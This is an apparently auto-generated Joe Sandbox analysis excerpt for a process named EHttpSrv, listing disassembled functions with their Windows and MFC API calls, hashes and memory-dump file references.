                                                                                                                • Instruction ID: f67a0cb9749c766af282978b63d155dd4df52af9296faa6f0a75167341ba6a5e
                                                                                                                • Opcode Fuzzy Hash: 98a892b8d0df8cd6ef370fa9880814b123266298d9cd77d375af763eb087fec2
                                                                                                                • Instruction Fuzzy Hash: AD8180719043849FDB24CF94CC95BDEB7A4BF44704F00C92EFA4A9B250DB79AA09CB52
                                                                                                                APIs
                                                                                                                • #4574.MFC80U ref: 204614A5
                                                                                                                • GetClientRect.USER32(?,?), ref: 204614B3
                                                                                                                • #2651.MFC80U(000004C6,0000000F), ref: 204614E4
                                                                                                                  • Part of subcall function 2045D0A0: GetParent.USER32(?), ref: 2045D0B0
                                                                                                                  • Part of subcall function 2045D0A0: #2366.MFC80U(00000000), ref: 2045D0B7
                                                                                                                  • Part of subcall function 2045D0A0: #4109.MFC80U(00000000,02000000,00000000), ref: 2045D0D7
                                                                                                                  • Part of subcall function 2045D0A0: GetClientRect.USER32(?,?), ref: 2045D0F1
                                                                                                                  • Part of subcall function 2045D0A0: GetWindowRect.USER32(?,00000000), ref: 2045D116
                                                                                                                  • Part of subcall function 2045D0A0: #5609.MFC80U(00000000), ref: 2045D123
                                                                                                                  • Part of subcall function 2045D0A0: malloc.MSVCR80 ref: 2045D12A
                                                                                                                  • Part of subcall function 2045D0A0: #5713.MFC80U(?,00000000), ref: 2045D177
                                                                                                                • #2651.MFC80U(00000428,00000009,000004C6,0000000F), ref: 204614F9
                                                                                                                • #2651.MFC80U(00000499,00000009,00000428,00000009,000004C6,0000000F), ref: 2046150E
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 2046153C
                                                                                                                • #2364.MFC80U(00000000), ref: 2046153F
                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 20461554
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 20461568
                                                                                                                • #3869.MFC80U(00000000,20485878,00000000,000000C8,000000FF), ref: 20461580
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 20461595
                                                                                                                • #2651.MFC80U(00000428,00000000), ref: 204615A9
                                                                                                                • #2155.MFC80U(00000428,00000000), ref: 204615B0
                                                                                                                • #2651.MFC80U(00000499,00000000,00000428,00000000), ref: 204615BE
                                                                                                                • #2155.MFC80U(00000499,00000000,00000428,00000000), ref: 204615C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651$MessageSend$Rect$#2155Client$#2364#2366#3869#4109#4574#5609#5713ParentWindowmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4050641184-0
                                                                                                                • Opcode ID: e2ca6bff617878acf79874e4f88d9535b3bc8e2d914fbb513a8aadbeaf0642eb
                                                                                                                • Instruction ID: 8aeb6e7560911261bafd35b6296635efa155aac981d9dbe41764942a1e8cde91
                                                                                                                • Opcode Fuzzy Hash: e2ca6bff617878acf79874e4f88d9535b3bc8e2d914fbb513a8aadbeaf0642eb
                                                                                                                • Instruction Fuzzy Hash: 4031D4707803027BE62897B48C42FBEB799AB54F04F40861DB259AB6D0DFA8A8458791
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,FEEA6C22), ref: 20441990
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 204419A5
                                                                                                                • #762.MFC80U(000002DC), ref: 204419CF
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U(00000000,FEEA6C22,00000000,?,?,00000000,00000000,20480B9B,000000FF,204419EB,00000000), ref: 20445C40
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C51
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C62
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C73
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C84
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445C95
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CA6
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CB7
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CC8
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CD9
                                                                                                                  • Part of subcall function 20445C00: #310.MFC80U ref: 20445CEA
                                                                                                                  • Part of subcall function 20445C00: EnterCriticalSection.KERNEL32(00003FC8,00000104), ref: 20445D13
                                                                                                                  • Part of subcall function 20445C00: LeaveCriticalSection.KERNEL32(00003FC8), ref: 20445D21
                                                                                                                  • Part of subcall function 20445C00: memset.MSVCR80 ref: 20445D2E
                                                                                                                • GetTickCount.KERNEL32 ref: 20441A95
                                                                                                                • #762.MFC80U(000005D4), ref: 20441AAD
                                                                                                                • GetTickCount.KERNEL32 ref: 20441AF1
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000), ref: 20441B3A
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20441B4F
                                                                                                                • #762.MFC80U(000000E8), ref: 20441B63
                                                                                                                • #762.MFC80U(00000058,00000000), ref: 20441BD9
                                                                                                                • #762.MFC80U(0000007C), ref: 20441C8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$CriticalSection$#762$EnterLeave$CountTick$memset
                                                                                                                • String ID: }
                                                                                                                • API String ID: 2898407527-4239843852
                                                                                                                • Opcode ID: cc26bdfaaf374ea7267c643fcee85da63826c3592bafba178029d9611c036d8f
                                                                                                                • Instruction ID: 67782cbd16a6edc87daeac32aed44315c09c759a4b5c5fe1bebd17b21bd0bd1d
                                                                                                                • Opcode Fuzzy Hash: cc26bdfaaf374ea7267c643fcee85da63826c3592bafba178029d9611c036d8f
                                                                                                                • Instruction Fuzzy Hash: 3EC1C472A097418FE714CF99D881B6BB7E5FBC4761F10862EF94697390DB39A800CB91
                                                                                                                APIs
                                                                                                                • #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BF3
                                                                                                                • memset.MSVCR80 ref: 20412C00
                                                                                                                • memset.MSVCR80 ref: 20412C7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$memset$#1176#265
                                                                                                                • String ID:
                                                                                                                • API String ID: 2140225662-0
                                                                                                                • Opcode ID: cced180ea473a5b1e1e367befc32688df4333c8617c2ef4c693b935e30686c1a
                                                                                                                • Instruction ID: 318eaf825227baa4e4400ef08250b981e21bef2880d11851eeb8ef97de00dd19
                                                                                                                • Opcode Fuzzy Hash: cced180ea473a5b1e1e367befc32688df4333c8617c2ef4c693b935e30686c1a
                                                                                                                • Instruction Fuzzy Hash: 09A1ADB1A006159FC314CFA8DA84B56FBA4BB54A14F04C62EE819C7751E738E9A4CFD1
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 20430AC1
                                                                                                                • #2788.MFC80U ref: 20430ACD
                                                                                                                • IsWindow.USER32(?), ref: 20430AE0
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20430B1B
                                                                                                                • SendMessageW.USER32(?,0000120B), ref: 20430B38
                                                                                                                • SendMessageW.USER32(?,0000120C,00000000,?), ref: 20430B74
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20430B86
                                                                                                                • SendMessageW.USER32(?,0000120B), ref: 20430BB3
                                                                                                                • SendMessageW.USER32(?,0000120C,?,?), ref: 20430CC7
                                                                                                                • SendMessageW.USER32(?,00001030,?,20430980), ref: 20430CFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$#2788
                                                                                                                • String ID: $
                                                                                                                • API String ID: 170428694-3993045852
                                                                                                                • Opcode ID: fa24ff3485e0c19831be8faee70d1698d032d1fc723f849b0ec9068bbd055843
                                                                                                                • Instruction ID: 5ac11d6b472a672f92059aeb1bc39d0abadbed3282ae6fcfb5d0dcd038441f01
                                                                                                                • Opcode Fuzzy Hash: fa24ff3485e0c19831be8faee70d1698d032d1fc723f849b0ec9068bbd055843
                                                                                                                • Instruction Fuzzy Hash: 8E61B4B19083549BD714CF98C850F9BBBE4AF88754F219B1DFA949B281C779EC04CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026$#2310#314#578#6735#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 1152340505-0
                                                                                                                • Opcode ID: aea3eb7ab47aaac884afba9da9087e3c5bd6c835ab55cae6a36f454c8326b254
                                                                                                                • Instruction ID: 8f5a687574ce4ce5ad568c4f72d1fdae622d59998485b5505ef5895051a5d4f4
                                                                                                                • Opcode Fuzzy Hash: aea3eb7ab47aaac884afba9da9087e3c5bd6c835ab55cae6a36f454c8326b254
                                                                                                                • Instruction Fuzzy Hash: CD619875A08700DFD704CF94C884B5AB7B5FB88719F10C62EEA516B390DB79A909CB92
                                                                                                                APIs
                                                                                                                • #310.MFC80U(00000000,FEEA6C22,00000000,?,?,00000000,00000000,20480B9B,000000FF,204419EB,00000000), ref: 20445C40
                                                                                                                • #310.MFC80U ref: 20445C51
                                                                                                                • #310.MFC80U ref: 20445C62
                                                                                                                • #310.MFC80U ref: 20445C73
                                                                                                                • #310.MFC80U ref: 20445C84
                                                                                                                • #310.MFC80U ref: 20445C95
                                                                                                                • #310.MFC80U ref: 20445CA6
                                                                                                                • #310.MFC80U ref: 20445CB7
                                                                                                                • #310.MFC80U ref: 20445CC8
                                                                                                                • #310.MFC80U ref: 20445CD9
                                                                                                                • #310.MFC80U ref: 20445CEA
                                                                                                                  • Part of subcall function 20440280: #6735.MFC80U ref: 204402E6
                                                                                                                  • Part of subcall function 20440280: #6735.MFC80U(20485878,0000011F), ref: 2044030D
                                                                                                                  • Part of subcall function 20440280: #6735.MFC80U(20485878), ref: 20440323
                                                                                                                • EnterCriticalSection.KERNEL32(00003FC8,00000104), ref: 20445D13
                                                                                                                • LeaveCriticalSection.KERNEL32(00003FC8), ref: 20445D21
                                                                                                                • memset.MSVCR80 ref: 20445D2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$#6735$CriticalSection$EnterLeavememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3143921478-0
                                                                                                                • Opcode ID: 2157d352ddc2455e798fedfbc3618833a5aa07da9aa986f8a3d86055a92f27a7
                                                                                                                • Instruction ID: 24daf216aa99d7273f657a96e9add7aef185053559727ef4d998557eda13c0bf
                                                                                                                • Opcode Fuzzy Hash: 2157d352ddc2455e798fedfbc3618833a5aa07da9aa986f8a3d86055a92f27a7
                                                                                                                • Instruction Fuzzy Hash: AB415E31008B81DFC311DF65CC8879BBBE4EB65719F048D2DE4A682291DB79660DCFA2
                                                                                                                APIs
                                                                                                                • #4109.MFC80U(00000000,00000120,00000000,?,000004C3,0000000F), ref: 2045F349
                                                                                                                • SendMessageW.USER32(?), ref: 2045F36E
                                                                                                                • #3877.MFC80U(00000001,00000000,00000000,00000000,00000000,00000000,00000000,FFFF0000,FFFF0000,?,00000000), ref: 2045F3FD
                                                                                                                • #5864.MFC80U(00000000,00000008,00000000,00000000,00000000,00000010,00000010,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,FFFF0000), ref: 2045F419
                                                                                                                • #5864.MFC80U(00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000000,00000008,00000000,00000000,00000000,00000010,00000010,00000000), ref: 2045F42E
                                                                                                                • #3877.MFC80U(00000001,?,00000000,00000000,00000000,00000000,00000000,FFFF0000,FFFF0002,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 2045F512
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 2045F528
                                                                                                                • #3877.MFC80U(00000001,?,00000000,00000000,00000000,00000000,00000000,FFFF0000,FFFF0002,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 2045F55B
                                                                                                                • #5864.MFC80U(00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00000000,FFFF0000), ref: 2045F57A
                                                                                                                • #5747.MFC80U(00000000,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000), ref: 2045F59D
                                                                                                                • SendMessageW.USER32(?,00001102,00000002,FFFF0000), ref: 2045F5DE
                                                                                                                • SendMessageW.USER32(?,00001101,00000000,00000000), ref: 2045F5F9
                                                                                                                • #5982.MFC80U(00000001,00000000,00000001,?,00000000), ref: 2045F626
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#3877#5864$#4109#5747#5982
                                                                                                                • String ID:
                                                                                                                • API String ID: 3275147637-0
                                                                                                                • Opcode ID: 9dd212be45086d75f6ae4a172555495b67a5b5979c489670bcb928c4cd8918b4
                                                                                                                • Instruction ID: e9f79f5a2f50c667ce6c69e562628473a29d41ef9b7a263904081b92f45a8f23
                                                                                                                • Opcode Fuzzy Hash: 9dd212be45086d75f6ae4a172555495b67a5b5979c489670bcb928c4cd8918b4
                                                                                                                • Instruction Fuzzy Hash: 6D818F70784302AFD318CF50C895F6ABBA4FB54B04F14865CF6455B2E2D7B8AC4ACB96
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20454236
                                                                                                                • wcsncmp.MSVCR80 ref: 204542A2
                                                                                                                  • Part of subcall function 2043AB10: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,204542B6), ref: 2043AB2A
                                                                                                                  • Part of subcall function 2043AB10: GetLastError.KERNEL32 ref: 2043AB35
                                                                                                                • wcsncmp.MSVCR80 ref: 204542EB
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 20454325
                                                                                                                • #1079.MFC80U(?,000000FF,?), ref: 20454368
                                                                                                                • DestroyCursor.USER32(?), ref: 20454383
                                                                                                                • #1176.MFC80U ref: 2045438B
                                                                                                                • #776.MFC80U(?), ref: 204543A1
                                                                                                                • #3873.MFC80U(00000003,00000000,?,00000000,00000000,?,00000000), ref: 204543C3
                                                                                                                • #5862.MFC80U(00000000,00000001,00000003,00000000,?,00000000,00000000,00000000,00000003,00000000,?,00000000,00000000,?,00000000), ref: 204543E6
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000,00000000,00000000), ref: 20454402
                                                                                                                • #5742.MFC80U(00000000,?,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000), ref: 20454430
                                                                                                                • #578.MFC80U ref: 20454444
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5862wcsncmp$#1079#1176#310#3873#5742#578#776CreateCursorDestroyErrorFileLastMetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1150038964-0
                                                                                                                • Opcode ID: 9f5206003f6ed2973ce07917a7ff6ec924d8b96aed58063a2543852da7b61b2e
                                                                                                                • Instruction ID: 479ed0915f2eeaa8b574ac43a3881d8b8663088f3cfef44c723c3c907148f41c
                                                                                                                • Opcode Fuzzy Hash: 9f5206003f6ed2973ce07917a7ff6ec924d8b96aed58063a2543852da7b61b2e
                                                                                                                • Instruction Fuzzy Hash: 0561D0713046009FD320CF58CC85F6EBBE4AFE4B18F50852CF545AB2E1DA75A94ACB91
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 20432E63
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000003), ref: 20432E80
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 20432E93
                                                                                                                • GetFocus.USER32 ref: 20432ED5
                                                                                                                • #2366.MFC80U(00000000), ref: 20432EDC
                                                                                                                • #5829.MFC80U(00000000), ref: 20432EE7
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20432F15
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20432F22
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20432F2F
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20432F57
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20432F64
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20432F71
                                                                                                                • #931.MFC80U(?), ref: 20432FA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect$Variant$#2366#5829#931ChangeCopyFocusInitType
                                                                                                                • String ID:
                                                                                                                • API String ID: 955593151-0
                                                                                                                • Opcode ID: c5e2da395930f61b844a44f2bc0d0ae6e1df8a7d97cae30f990c223835d46e9f
                                                                                                                • Instruction ID: 54aef1c164e554c70e00ceb81e3176a7b1b36d9b59236c1140e2668beb021dd4
                                                                                                                • Opcode Fuzzy Hash: c5e2da395930f61b844a44f2bc0d0ae6e1df8a7d97cae30f990c223835d46e9f
                                                                                                                • Instruction Fuzzy Hash: 29415072204704ABC310DFA8CC85EABB7E8FB88754F40CA1DFA45C7250E675E904CBA1
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C441
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C45A
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C473
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C48C
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4A5
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4BE
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4CE
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4DE
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4FA
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C516
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C532
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C54D
                                                                                                                • #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C56C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
